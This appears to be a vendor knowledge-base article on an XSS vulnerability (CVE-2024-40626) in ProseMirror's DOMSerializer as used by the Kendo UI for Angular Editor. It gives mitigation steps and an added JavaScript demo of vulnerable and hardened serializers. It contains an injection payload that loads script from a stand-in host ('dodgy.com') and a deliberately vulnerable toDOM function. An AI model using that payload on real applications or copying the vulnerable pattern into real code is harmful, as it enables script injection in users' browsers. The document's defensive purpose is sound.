Avoiding XSS Vulnerability in the ProseMirror Engine
Environment
Product | Progress® Kendo UI® for Angular Editor |
Description
A critical security issue may affect applications that use the Kendo UI for Angular Editor component, especially when its schema is customized using ProseMirror. This article describes the Cross-Site Scripting (XSS) vulnerability and provides steps to mitigate the associated risk.
A Cross-Site Scripting (XSS) vulnerability, tracked as CVE-2024-40626, exists in ProseMirror's DOMSerializer. It allows malicious actors to inject scripts into the DOM through applications that customize the Editor's schema with custom nodes or marks. Applications using Editor versions before v16.6.0 are particularly at risk.
This KB article also answers the following questions:
- How to prevent XSS vulnerabilities in Angular Editor?
- How to secure custom ProseMirror schema from XSS attacks in Editor?
- What is the CVE-2024-40626 vulnerability in Editor, and how to fix it?
Problematic Scenario
When adding a custom node type to the Editor, failing to validate and sanitize input properly allows malicious users to craft payloads that, when serialized by ProseMirror, inject scripts into the DOM, potentially executing harmful code in users' browsers.
Consider a node or mark serializer (e.g., a toDOM spec or a function passed to the DOMSerializer) that inserts an attribute value directly into the array used to describe the DOM structure:

```js
node => ["span", node.attrs.label]
```

An attacker can inject something like the following into your document through a tampered API request:

```js
attrs: {label: ["script", {src: "//dodgy.com/script.js"}]}
```

Because the DOMSerializer treats a nested array as a DOM spec rather than as text, it can emit arbitrary HTML tags, which may lead to malicious code being executed when the content is rendered by the browser.
Solution
- Upgrade the Kendo UI for Angular Editor package to 16.6.0 or later. The XSS vulnerability has been fixed in version 16.6.0. To protect your application, upgrade to this version or any newer release.
- Sanitize the input. Even after upgrading, continue to follow best practices for sanitizing and validating all user input. If you have extended the editor's schema with custom nodes, ensure the data is sanitized both when it is entered and when it is serialized into the DOM.
- Review any custom nodes or marks you have added. Be especially cautious with features involving user-generated content. Handling untrusted input without proper sanitization can expose your application to XSS attacks.
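The following is an added example, not code from the KB article, from ProseMirror or from Kendo UI. It illustrates both the problematic scenario above and the "sanitize on entry and on serialization" advice: a miniature re-implementation of the `["tag", {attrs}, ...children]` DOM-spec format that the DOMSerializer consumes, rendering to an HTML string instead of live DOM nodes so it runs outside a browser (the content hole `0` and namespaced tags are left out). The function names (`renderSpec`, `validateLabelAttr`, `renderVulnerable`, `renderGuarded`, `renderHardened`) and the sample nodes are this example's own assumptions; the attack payload is the one shown in the article.

```javascript
// Added example for this KB article; it is not ProseMirror's or Kendo UI's own
// code. It re-implements, in miniature, the ["tag", {attrs}, ...children]
// DOM-spec format that ProseMirror's DOMSerializer consumes, rendering to an
// HTML string instead of live DOM nodes so it runs outside a browser (the
// content hole `0` and namespaced tags are omitted). All function names and
// the sample nodes below are this example's own.

const VOID_TAGS = new Set(["br", "hr", "img", "input"]);

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Renders a DOM spec: a string becomes a text node, an array becomes
// ["tag", optionalAttrs, ...children]. `blockArraysIn` is optional: when the
// node's attrs object is passed, any nested array that *is* one of those
// attribute values is refused. This identity check is our own illustration of
// the defence idea; it catches a toDOM that forwards an attribute unchanged.
function renderSpec(spec, blockArraysIn) {
  if (typeof spec === "string") return escapeHtml(spec);
  if (!Array.isArray(spec) || typeof spec[0] !== "string") {
    throw new RangeError("Invalid DOM spec");
  }
  if (blockArraysIn && Object.values(blockArraysIn).some((v) => v === spec)) {
    throw new RangeError("Array taken from node attrs used as a DOM spec");
  }
  const tag = spec[0];
  let attrs = "";
  let i = 1;
  if (spec[1] !== null && typeof spec[1] === "object" && !Array.isArray(spec[1])) {
    for (const [k, v] of Object.entries(spec[1])) {
      if (v != null) attrs += ` ${k}="${escapeHtml(v)}"`;
    }
    i = 2;
  }
  let html = `<${tag}${attrs}>`;
  if (VOID_TAGS.has(tag)) return html;
  for (; i < spec.length; i++) html += renderSpec(spec[i], blockArraysIn);
  return `${html}</${tag}>`;
}

// The toDOM from the article: the attribute value goes straight into the spec.
const vulnerableLabelToDOM = (node) => ["span", node.attrs.label];

// Hardened toDOM: the attribute is always emitted as text, never as structure.
const safeLabelToDOM = (node) => ["span", String(node.attrs.label ?? "")];

// Input-side check, to run when a document arrives (e.g. from an API request):
// `label` must be a plain string, so an array can never reach the serializer.
function validateLabelAttr(attrs) {
  return typeof attrs.label === "string";
}

function renderVulnerable(node) {
  return renderSpec(vulnerableLabelToDOM(node));
}

// Same vulnerable toDOM, but the serializer knows which arrays belong to attrs.
function renderGuarded(node) {
  return renderSpec(vulnerableLabelToDOM(node), node.attrs);
}

// Validate on entry, then serialize with the hardened toDOM (defence in depth).
function renderHardened(node) {
  if (!validateLabelAttr(node.attrs)) {
    throw new TypeError("label attribute rejected: expected a string");
  }
  return renderSpec(safeLabelToDOM(node), node.attrs);
}

// Constructed sample nodes. ATTACK_NODE carries the payload from the article.
const ATTACK_NODE = {
  type: "label",
  attrs: { label: ["script", { src: "//dodgy.com/script.js" }] },
};
const BENIGN_NODE = { type: "label", attrs: { label: "Hello <b>" } };

if (typeof require !== "undefined" && require.main === module) {
  console.log(renderVulnerable(ATTACK_NODE)); // the injected <script> tag appears
  for (const render of [renderGuarded, renderHardened]) {
    try { console.log(render(ATTACK_NODE)); } catch (e) { console.log(`${render.name}: ${e.message}`); }
  }
  console.log(renderHardened(BENIGN_NODE)); // label is emitted as escaped text
}
```

Running the block shows the three outcomes side by side: the vulnerable toDOM turns the attribute into a `<script>` element, the guarded serializer refuses the aliased array, and the hardened path rejects the payload at validation time while still rendering a legitimate label as escaped text. In a real application the `validateLabelAttr` step belongs wherever documents enter the system, and the toDOM change belongs in every custom node or mark spec that reads attributes.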